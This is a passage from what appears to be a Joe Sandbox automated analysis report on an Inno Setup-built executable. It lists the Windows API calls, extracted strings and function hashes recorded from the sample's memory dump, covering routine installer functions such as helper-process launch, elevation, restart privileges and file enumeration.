                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                              • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                              • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                              • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                              • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                              • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                              • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                              • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                              • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                              • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                              • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                              • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                              • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                              • API String ID: 2323315520-3614243559
                                                                              • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                              • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                              • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                              • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 0045847F
                                                                              • QueryPerformanceCounter.KERNEL32(02343858,00000000,00458712,?,?,02343858,00000000,?,00458E0E,?,02343858,00000000), ref: 00458488
                                                                              • GetSystemTimeAsFileTime.KERNEL32(02343858,02343858), ref: 00458492
                                                                              • GetCurrentProcessId.KERNEL32(?,02343858,00000000,00458712,?,?,02343858,00000000,?,00458E0E,?,02343858,00000000), ref: 0045849B
                                                                              • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458511
                                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02343858,02343858), ref: 0045851F
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,004586CE), ref: 00458567
                                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,004586BD,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,004586CE), ref: 004585A0
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458649
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045867F
                                                                              • CloseHandle.KERNEL32(000000FF,004586C4,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004586B7
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                              • API String ID: 770386003-3271284199
                                                                              • Opcode ID: 9504134f1b0840cae109e3ce12893ae1ca881710e7b52e2eec49e0a39d18bb41
                                                                              • Instruction ID: 01244017a6d81f6d28e4b5174d8fffcdbc0783d4be9496fecaa57000614c8eca
                                                                              • Opcode Fuzzy Hash: 9504134f1b0840cae109e3ce12893ae1ca881710e7b52e2eec49e0a39d18bb41
                                                                              • Instruction Fuzzy Hash: 71711370A003449EDB10EF65CC45B9EBBF4EB15705F5084BAF918FB282DB7899448F69
                                                                              APIs
                                                                                • Part of subcall function 00477E90: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EA9
                                                                                • Part of subcall function 00477E90: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477EAF
                                                                                • Part of subcall function 00477E90: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EC2
                                                                                • Part of subcall function 00477E90: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC), ref: 00477EEC
                                                                                • Part of subcall function 00477E90: CloseHandle.KERNEL32(00000000,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477F0A
                                                                                • Part of subcall function 00477F68: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477FFA,?,?,?,02342BDC,?,0047805C,00000000,00478172,?,?,-00000010,?), ref: 00477F98
                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004780AC
                                                                              • GetLastError.KERNEL32(00000000,00478172,?,?,-00000010,?), ref: 004780B5
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478102
                                                                              • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478126
                                                                              • CloseHandle.KERNEL32(00000000,00478157,00000000,00000000,000000FF,000000FF,00000000,00478150,?,00000000,00478172,?,?,-00000010,?), ref: 0047814A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                              • API String ID: 883996979-221126205
                                                                              • Opcode ID: 3f9d2181694077b21b868e71eca94cf7724c1513c234160a79aee89dede81d9c
                                                                              • Instruction ID: 4776828256a8cc8572350b5820200226dc7264e1f18f620f8b2e082d5f540a6f
                                                                              • Opcode Fuzzy Hash: 3f9d2181694077b21b868e71eca94cf7724c1513c234160a79aee89dede81d9c
                                                                              • Instruction Fuzzy Hash: 6E316670940208AEDB10EFE6C845ADEB7B8EB04318F90847FF518F7281DA7899058B59
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                              • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1631623395-0
                                                                              • Opcode ID: feaf7eda56c5d7a46aeac68601ea302718d54c2d1d0da18b2df088f526b52f35
                                                                              • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                              • Opcode Fuzzy Hash: feaf7eda56c5d7a46aeac68601ea302718d54c2d1d0da18b2df088f526b52f35
                                                                              • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00418393
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                              • GetWindowRect.USER32(?), ref: 004183CC
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                              • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                              • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                              • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                              • String ID: ,
                                                                              • API String ID: 2266315723-3772416878
                                                                              • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                              • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                              • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                              • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 71598a6bdd6d5fb56d5762fa92910e3e26de8c4971b3032dc2bdc18874b6a41e
                                                                              • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                              • Opcode Fuzzy Hash: 71598a6bdd6d5fb56d5762fa92910e3e26de8c4971b3032dc2bdc18874b6a41e
                                                                              • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFE1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFF1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D001
                                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F453,00000000,0047F47C), ref: 0045D026
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CryptVersion
                                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                              • API String ID: 1951258720-508647305
                                                                              • Opcode ID: 6bea81dda9fbb2f0804f4d34ed7f3fdf770b10932dc8999661774a36d6befbc1
                                                                              • Instruction ID: 053e23ae93e59936775da3b85939a49c1ec117bb16e32bace9e6a444f988995f
                                                                              • Opcode Fuzzy Hash: 6bea81dda9fbb2f0804f4d34ed7f3fdf770b10932dc8999661774a36d6befbc1
                                                                              • Instruction Fuzzy Hash: 3EF0F9B0980700CBE728EFB6ACC67263795EB9570AF14813BA808A11E2D7780499CB1C
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00497D52,?,?,00000000,0049B628,?,00497EDC,00000000,00497F30,?,?,00000000,0049B628), ref: 00497C6B
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497CEE
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00497D2A,?,00000000,?,00000000,00497D52,?,?,00000000,0049B628,?,00497EDC,00000000), ref: 00497D06
                                                                              • FindClose.KERNEL32(000000FF,00497D31,00497D2A,?,00000000,?,00000000,00497D52,?,?,00000000,0049B628,?,00497EDC,00000000,00497F30), ref: 00497D24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                                              • String ID: isRS-$isRS-???.tmp
                                                                              • API String ID: 134685335-3422211394
                                                                              • Opcode ID: 364c0e76f2c6b87ee015195f117b48597cda05d20fe84bdce713179882c005fd
                                                                              • Instruction ID: 58584d30a9cebb9496c34c78ac808807487b68c9e5340ea926fa5a91c3adbdad
                                                                              • Opcode Fuzzy Hash: 364c0e76f2c6b87ee015195f117b48597cda05d20fe84bdce713179882c005fd
                                                                              • Instruction Fuzzy Hash: 22316571A146086BDF10EF65CC41ADEBBBCDF49304F5085BBA908A32A1E63C9E458F58
                                                                              APIs
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0045745D
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457484
                                                                              • SetForegroundWindow.USER32(?), ref: 00457495
                                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045776F,?,00000000,004577AB), ref: 0045775A
                                                                              Strings
                                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                              • API String ID: 2236967946-3182603685
                                                                              • Opcode ID: 6bd6caa41a15310477e83bc0a49d1206285915d7cd4776c217e2dcd25b97f1c8
                                                                              • Instruction ID: fa7acb0e2d6b8d582b6902519899a90ae2b0afcf3fbb82d78ce799b77582f668
                                                                              • Opcode Fuzzy Hash: 6bd6caa41a15310477e83bc0a49d1206285915d7cd4776c217e2dcd25b97f1c8
                                                                              • Instruction Fuzzy Hash: DF91D134608204EFD715CF69E991F5ABBF9FB49704F2180BAEC0497792D638AE04DB58
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                              • API String ID: 1646373207-3712701948
                                                                              • Opcode ID: 425acd45c57e1a90a14b519a9b70c26380c560e6a4faa307eedde0d31f767984
                                                                              • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                              • Opcode Fuzzy Hash: 425acd45c57e1a90a14b519a9b70c26380c560e6a4faa307eedde0d31f767984
                                                                              • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID: ,
                                                                              • API String ID: 568898626-3772416878
                                                                              • Opcode ID: a0af22d6e47f15c5c805b34526d81a80d06eca119401db975a7b3104afeb2d4e
                                                                              • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                              • Opcode Fuzzy Hash: a0af22d6e47f15c5c805b34526d81a80d06eca119401db975a7b3104afeb2d4e
                                                                              • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,00463D0D), ref: 00463B81
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00463CE0,?,00000001,00000000,00463D0D), ref: 00463C10
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00463CC2,?,00000000,?,00000000,00463CE0,?,00000001,00000000,00463D0D), ref: 00463CA2
                                                                              • FindClose.KERNEL32(000000FF,00463CC9,00463CC2,?,00000000,?,00000000,00463CE0,?,00000001,00000000,00463D0D), ref: 00463CBC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
